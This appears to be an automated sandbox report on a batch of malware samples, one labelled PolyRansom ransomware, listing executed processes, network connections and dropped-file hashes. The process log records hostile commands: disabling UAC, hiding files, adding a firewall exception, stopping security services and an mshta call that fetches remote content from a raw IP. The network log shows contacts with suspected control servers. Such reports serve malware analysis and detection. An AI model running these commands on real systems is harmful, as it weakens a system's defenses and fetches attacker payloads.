C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZCgAUUYE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3476 -s 2364

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 448

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5324 -ip 5324

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 492 -p 3476 -ip 3476

C:\Windows\SysWOW64\mshta.exe

mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=GBQHURCC&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=1033"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6780 -ip 6780

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\VAV\vav.exe"

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6592 -ip 6592

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 444

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\[email protected]" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\1233.mof"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.113.4:443 github.com tcp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 140.82.113.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 93.184.221.240:80 tcp
NL 104.80.225.205:443 tcp
US 8.8.8.8:53 udp
IE 13.69.239.73:443 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:80 google.com tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:80 google.com tcp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
FR 46.105.131.122:80 tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 8.8.8.8:53 www.vikingwebscanner.com udp
DE 185.53.177.53:80 www.vikingwebscanner.com tcp
SG 76.73.17.194:9090 tcp
DE 78.159.97.210:80 78.159.97.210 tcp
US 8.8.8.8:53 arizonacode.bplaced.net udp
DE 162.55.0.137:80 arizonacode.bplaced.net tcp
US 74.82.198.253:80 tcp
FR 46.105.131.122:80 tcp
N/A 10.127.0.1:445 tcp
DE 78.159.97.210:80 tcp
US 8.8.8.8:53 fastsofgeld.com udp
N/A 10.127.0.1:445 tcp
NL 142.250.179.142:445 google.com tcp
US 93.184.221.240:445 tcp
DE 185.53.177.53:445 www.vikingwebscanner.com tcp
US 52.109.13.64:445 nexusrules.officeapps.live.com tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 ashamedice.com udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 google.ru udp
DE 185.53.177.53:139 www.vikingwebscanner.com tcp
N/A 10.127.0.1:139 tcp
NL 142.250.179.142:139 google.com tcp
US 93.184.221.240:139 tcp
US 52.109.13.64:139 nexusrules.officeapps.live.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 searchaccount.org udp
NL 142.251.36.35:80 google.ru tcp
RU 77.88.55.50:80 yandex.ru tcp
US 8.8.8.8:53 frequentwin.com udp
US 140.82.112.4:443 github.com tcp
US 8.8.8.8:53 searchdusty.com udp
RU 77.88.55.50:443 yandex.ru tcp
N/A 10.127.0.2:445 tcp
FR 37.187.79.168:80 searchdusty.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
FR 37.187.79.168:80 searchdusty.com tcp
N/A 10.127.0.2:139 tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
N/A 10.127.0.3:445 tcp
DE 78.159.97.210:80 tcp
N/A 10.127.0.3:139 tcp
US 8.8.8.8:53 15.89.54.20.in-addr.arpa udp
DE 78.159.97.210:80 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
SE 171.25.193.9:80 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
US 128.31.0.39:9101 tcp
N/A 10.127.0.6:139 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
NL 51.158.165.51:9001 tcp
CH 185.147.11.200:443 tcp
IT 95.239.220.198:9010 tcp
BO 200.87.164.69:9999 tcp
N/A 10.127.0.7:445 tcp
NL 142.250.179.142:80 google.com tcp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
FR 46.105.131.122:80 tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
NL 142.250.179.142:80 google.com tcp
N/A 10.127.0.7:139 tcp
UA 78.26.187.35:80 tcp
DE 78.159.97.210:445 tcp
FI 65.108.73.108:445 tcp
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 arizonacode.bplaced.net udp
DE 78.159.97.210:80 tcp
DE 78.159.97.210:139 tcp
FI 65.108.73.108:139 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp
DE 185.53.177.53:80 www.vikingwebscanner.com tcp
N/A 10.127.0.8:445 tcp
DE 162.55.0.137:80 arizonacode.bplaced.net tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
DE 162.55.0.137:80 arizonacode.bplaced.net tcp
US 74.82.198.254:80 tcp
N/A 10.127.0.12:445 tcp
BO 200.119.204.12:9999 tcp
US 8.8.8.8:53 google.com udp
BO 200.87.164.69:9999 tcp
NL 142.250.179.142:80 google.com tcp
BO 200.87.164.69:9999 tcp
N/A 10.127.0.12:139 tcp
NL 142.250.179.142:80 google.com tcp
BO 200.119.204.12:9999 tcp
DE 78.159.97.210:80 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
SG 76.73.19.181:80 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
US 74.82.198.253:80 tcp
N/A 10.127.0.17:139 tcp
BO 190.186.45.170:9999 tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 frequentwin.com udp
FR 37.187.79.168:80 searchdusty.com tcp
FR 37.187.79.168:80 searchdusty.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
N/A 10.127.0.18:445 tcp
DE 78.159.97.210:80 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
US 74.82.198.254:80 tcp
BO 190.186.45.170:9999 tcp
N/A 10.127.0.23:445 tcp
BO 190.186.45.170:9999 tcp
N/A 10.127.0.23:139 tcp
DE 78.159.97.210:80 tcp

Files

memory/3388-132-0x0000025E281E0000-0x0000025E2820C000-memory.dmp

memory/3388-133-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/3388-134-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe.log

MD5 66a0a4aa01208ed3d53a5e131a8d030a
SHA1 ef5312ba2b46b51a4d04b574ca1789ac4ff4a6b1
SHA256 f0ab05c32d6af3c2b559dbce4dec025ce3e730655a2430ade520e89a557cace8
SHA512 626f0dcf0c6bcdc0fef25dc7da058003cf929fd9a39a9f447b79fb139a417532a46f8bca1ff2dbde09abfcd70f5fb4f8d059b1fe91977c377df2f5f751c84c5c

memory/3388-137-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-138-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-139-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/1508-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

memory/1460-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

memory/2800-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/2916-149-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

memory/2800-156-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/5020-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
SHA512 2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

memory/3696-160-0x0000000000000000-mapping.dmp

memory/4012-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 41789c704a0eecfdd0048b4b4193e752
SHA1 fb1e8385691fa3293b7cbfb9b2656cf09f20e722
SHA256 b2dcfdf9e7b09f2aa5004668370e77982963ace820e7285b2e264a294441da23
SHA512 76391ac85fdc3be75441fcd6e19bed08b807d3946c7281c647f16a3be5388f7be307e6323fac8502430a4a6d800d52a88709592a49011ecc89de4f19102435ea

memory/8-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fbbdc39af1139aebba4da004475e8839
SHA1 de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512 74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

memory/3292-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 248aadd395ffa7ffb1670392a9398454
SHA1 c53c140bbdeb556fca33bc7f9b2e44e9061ea3e5
SHA256 51290129cccca38c6e3b4444d0dfb8d848c8f3fc2e5291fc0d219fd642530adc
SHA512 582b917864903252731c3d0dff536d7b1e44541ee866dc20e0341cbee5450f2f0ff4d82e1eee75f770e4dad9d8b9270ab5664ffedfe21d1ad2bd7fe6bc42cf0e

memory/8-165-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2800-166-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/4396-169-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

memory/4012-179-0x0000000000400000-0x0000000000450000-memory.dmp

memory/4396-185-0x0000000005A00000-0x0000000005A9C000-memory.dmp

memory/4396-180-0x0000000000F80000-0x0000000001172000-memory.dmp

memory/5056-190-0x0000000000000000-mapping.dmp

memory/3696-184-0x0000000000760000-0x00000000007E2000-memory.dmp

memory/4688-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 2eb3ce80b26345bd139f7378330b19c1
SHA1 10122bd8dd749e20c132d108d176794f140242b0
SHA256 8abed3ea04d52c42bdd6c9169c59212a7d8c649c12006b8278eda5aa91154cd2
SHA512 e3223cd07d59cd97893304a3632b3a66fd91635848160c33011c103cca2badbfe9b78fe258666b634e455872f3a98889ede5a425d8fae91cae6983da1ea1190a

memory/2084-192-0x0000000005AD0000-0x0000000006074000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 2eb3ce80b26345bd139f7378330b19c1
SHA1 10122bd8dd749e20c132d108d176794f140242b0
SHA256 8abed3ea04d52c42bdd6c9169c59212a7d8c649c12006b8278eda5aa91154cd2
SHA512 e3223cd07d59cd97893304a3632b3a66fd91635848160c33011c103cca2badbfe9b78fe258666b634e455872f3a98889ede5a425d8fae91cae6983da1ea1190a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

memory/2540-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 1f13396fa59d38ebe76ccc587ccb11bb
SHA1 867adb3076c0d335b9bfa64594ef37a7e2c951ff
SHA256 83ecb875f87150a88f4c3d496eb3cb5388cd8bafdff4879884ececdbd1896e1d
SHA512 82ca2c781bdaa6980f365d1eedb0af5ac5a80842f6edc28a23a5b9ea7b6feec5cd37d54bd08d9281c9ca534ed0047e1e234873b06c7d2b6fe23a7b88a4394fdc

memory/8-201-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2084-204-0x00000000057A0000-0x00000000057F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

memory/2968-205-0x0000000000000000-mapping.dmp

memory/4396-203-0x00000000059E0000-0x00000000059EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 1f13396fa59d38ebe76ccc587ccb11bb
SHA1 867adb3076c0d335b9bfa64594ef37a7e2c951ff
SHA256 83ecb875f87150a88f4c3d496eb3cb5388cd8bafdff4879884ececdbd1896e1d
SHA512 82ca2c781bdaa6980f365d1eedb0af5ac5a80842f6edc28a23a5b9ea7b6feec5cd37d54bd08d9281c9ca534ed0047e1e234873b06c7d2b6fe23a7b88a4394fdc

memory/4012-199-0x0000000001650000-0x0000000001681000-memory.dmp

memory/3696-194-0x0000000005160000-0x00000000051F2000-memory.dmp

memory/2084-189-0x0000000000B90000-0x0000000000BCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 87ccd6f4ec0e6b706d65550f90b0e3c7
SHA1 213e6624bff6064c016b9cdc15d5365823c01f5f
SHA256 e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4
SHA512 a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 87ccd6f4ec0e6b706d65550f90b0e3c7
SHA1 213e6624bff6064c016b9cdc15d5365823c01f5f
SHA256 e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4
SHA512 a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

memory/8-183-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 04155ed507699b4e37532e8371192c0b
SHA1 a14107131237dbb0df750e74281c462a2ea61016
SHA256 b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
SHA512 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 04155ed507699b4e37532e8371192c0b
SHA1 a14107131237dbb0df750e74281c462a2ea61016
SHA256 b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
SHA512 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371

memory/2376-178-0x0000000000000000-mapping.dmp

memory/2876-175-0x0000000000000000-mapping.dmp

memory/8-174-0x0000000000690000-0x0000000000696000-memory.dmp

memory/3480-208-0x0000000000000000-mapping.dmp

memory/2440-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 af2379cc4d607a45ac44d62135fb7015
SHA1 39b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA256 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA512 69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

memory/3480-213-0x0000000000690000-0x00000000006BE000-memory.dmp

memory/5052-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/456-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

memory/2084-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
